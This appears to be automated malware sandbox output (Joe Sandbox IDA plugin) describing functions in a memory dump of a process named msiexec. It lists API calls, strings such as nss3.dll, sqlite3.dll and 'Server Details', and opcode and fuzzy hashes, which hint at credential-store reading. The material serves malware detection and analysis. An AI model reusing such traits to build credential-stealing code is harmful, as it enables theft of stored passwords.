                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                      • String ID: recovered %d pages from %s
                                                                      • API String ID: 985450955-1623757624
                                                                      • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                      • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                      • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                      • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _ultoasprintf
                                                                      • String ID: %s %s %s
                                                                      • API String ID: 432394123-3850900253
                                                                      • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                      • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                      APIs
                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                      • String ID: menu_%d
                                                                      • API String ID: 1129539653-2417748251
                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                      APIs
                                                                      Strings
                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _msizerealloc
                                                                      • String ID: failed memory resize %u to %u bytes
                                                                      • API String ID: 2713192863-2134078882
                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                      APIs
                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                      • String ID: sqlite3.dll
                                                                      • API String ID: 1983510840-1155512374
                                                                      • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                      • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                      • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                      • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                      APIs
                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID: A4@$Server Details
                                                                      • API String ID: 1096422788-4071850762
                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                      APIs
                                                                      • strlen.MSVCRT ref: 0040849A
                                                                      • memset.MSVCRT ref: 004084D2
                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,67CA7B60,?,00000000), ref: 0040858F
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,67CA7B60,?,00000000), ref: 004085BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                      • String ID:
                                                                      • API String ID: 3110682361-0
                                                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2591069807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID:
                                                                      • API String ID: 3510742995-0
                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8